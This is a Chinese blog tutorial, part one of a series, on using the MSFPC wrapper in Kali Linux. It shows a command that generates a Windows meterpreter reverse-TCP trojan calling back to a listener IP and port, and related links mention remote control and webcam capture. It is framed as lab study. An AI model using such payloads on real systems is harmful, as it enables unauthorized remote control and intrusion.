白帽子黑客与网络安全工程师教你:如何使用MSFPC半自动化生成强大的木码?【上集】

最新推荐文章于 2023-06-29 14:23:37 发布
最新推荐文章于 2023-06-29 14:23:37 发布
阅读量402 收藏 3
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络 信息安全 计算机视觉 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/108969806
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!

正文部分
一、背景介绍
一般来说,生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个非常强大的payload生成神器,但是对于一些新手来说,可能难以在短时间内熟悉其操作。即使在进行最初的了解之后,生成一个基本的payload也需要输入相当多的内容,而今天,我们将看到使用MSFPC更便捷地生成paylaod。
MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的Payload生成器,但是它旨在简化基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单地创建Payload,有时甚至只需要一个参数!如果你以前使用过MSFvenom,那么可能已经自行编写了一个简单的shell脚本来自动化频繁地生成Payload。即使这样,这个工具也绝对值得一试。

二、资源装备
1.安装好 Kali Linux 的虚拟机一台;
2.kali linux 受害者虚拟机一个;
3.整装待发的小白一个。

三、战略安排
3.1 通过Nmap脚本扫描WEB服务器或个人计算机是否被植入木马
命令:nmap --script=http-malware-host IP
命令:nmap --script=http-malware-host 192.168.0.103
在这里插入图片描述

3.2 nmap扫描结果如下图所示。
Host appears to be clean表示扫描的主机没有被植入木马。
图片: https://uploader.shimo.im/f/NI8FqtYOhWtiuyXC.png

3.3 普通的经常使用的Payload生成器简单介绍,如下图所示。
命令:msfvenom
图片: https://uploader.shimo.im/f/8ioklApEWzEiSOh9.png图片: https://uploader.shimo.im/f/YG4wm3TXNxg8U2mT.png
在这里插入图片描述

3.4 利用命令行查看msfpc payload生成器生成的payload类别。
命令:msfpc
命令:msfpc --help
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.5 查看即将充当监听主机的主机IP地址,如下图所示。
命令:ifconfig
图片: https://uploader.shimo.im/f/HOGsSlCansjV75AC.png

3.6 利用msfpc开始监听端口并且生成相应的payload,如下图所示。
命令:msfpc windows IP port
命令:msfpc windows 192.168.0.104 555
在这里插入图片描述
在这里插入图片描述

3.7 查看msfpc工具生成的payload信息,如下图所示。
命令:ls
文件: windows-meterpreter-staged-reverse-tcp-555.exe
文件: windows-meterpreter-staged-reverse-tcp-555.exe.rc(payload配置信息)
在这里插入图片描述

3.8 查看“windows-meterpreter-staged-reverse-tcp-555.exe.rc”的文件内容,如下图所示。
图片: https://uploader.shimo.im/f/zHk3Twpdxz2haKrn.png

辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢!
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
如何使用MSFPC
Ms08067安全实验室
03-18 1627
注意:本文中所有操作是在Kali linux 2020.4中完成。如果使用Kali linux2020.1等版本,可能会因为msfpc没有root权限,在调用ifconfig命令时出错,此...
在Kali中使用MSFPC生成被控端并进行远程控制
最新发布
weixin_44789393的博客
04-07 918
远程控制是指通过网络连接到另一台计算机,并在远程执行操作的过程。在网络安全领域,远程控制通常用于渗透测试、远程管理和监控等目的。在kali linux中提供了一个名为MSFPC(全称为MSFvenom Payload Creator)的工具,它是MSFvenom的优化版,是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。
使用msfvenom生成被控端并进行远程控制
2301_78429157的博客
06-29 454
传送payload 将生成的payload文件(payload.exe)传送到目标机器上。在网络安全领域中,远程控制是一项常见的技术,它允许安全专业人员模拟攻击并评估系统的安全性。远程控制 一旦连接建立成功,你将获得一个Meterpreter Shell,可以在目标机器上执行各种操作和命令。执行payload 在目标机器上执行payload文件。一旦执行成功,它将尝试连接本地机器上的Metasploit监听器。生成payload 首先,我们需要使用msfvenom生成恶意的payload。
使用MSFPC远程控制
y3174445239的博客
06-24 486
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
攻击篇--远程控制(一)生成被控端与主控端
qq_40424448的博客
06-03 4460
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200端口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
linux漏洞利用工具,Kali Linux 漏洞利用工具集 msfpc
weixin_36415835的博客
05-06 406
MSFPC全称“MSFvenom Payload Creator”是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式...
漏洞利用工具集 msfpc
qq_39610627的博客
01-06 1032
漏洞利用工具集 msfpc 生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个非常强大的payload生成神器,但是对于一些新手来说,可能难以在短时间内熟悉其操作。即使在进行最初的了解之后,生成一个基本的payload也需要输入相当多的内容。 MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的Payload生成器,简化基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单地创建Payloa
MSFPC半自动化生成强大的木马Payload
dongxieaitonglao的博客
03-16 467
MSFPC=MSFvenom Payload Creator 客户端访问该IP,并下载木马。(前提没有防火墙) 监听端linux 运行配置脚本(批量配置) 在被攻击端点击木马,会话即建立。 选择一个会话进入的命令 sessions -i 1 ...
Metasploit小技巧
weixin_30443813的博客
08-07 271
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
白帽子黑客网络安全工程师你:如何使用MSFPC半自动化生成强大木码?【下集】
Kali与编程
10-10 251
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 三、战略安排 3.1 查看监听主机的apapche2状态,如下图所示。 命令:service apapche2 status 3.2 开启监听主机的apapche2主机,如下图所示。 命令:service apache2 start 3.3 将生成的“windows-meterpreter-staged-reverse-tcp-55
六、Kali Linux 2 远程控制
m0_55313512的博客
02-20 3332
Kali Linux 网络渗透测试
metasploit工具的Windows版安装及使用
爱国小白帽
03-29 2万+
点击下载 msfconsole
Kali渗透测试:远程控制程序基础
Liu_Bruce的博客
05-07 3574
Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206) 1. 使用MSFPC生成被控端 远程控制软件中的被控端和主控端必须是成对使用的。被控端运行在目标设备上,其功能挺起来和木马很像,实际上是如此,被控端(可以是一段代码,也可以是一个能直接执行的程序)。在Kali Li
渗透学习笔记1【metasploit通过exe对他人电脑进行操控】
Sp4rkW的博客
12-18 7090
注:此内容不得用于违法活动,仅供学习交流使用~ 最近在学习metaspolit,参考几个大佬的博客,整理实测了metespolit一次渗透~ 0X01、木马检测原理 杀毒软件判断病毒木马的方式如下: 特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。 云扫描法:将可疑文件上传到云
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值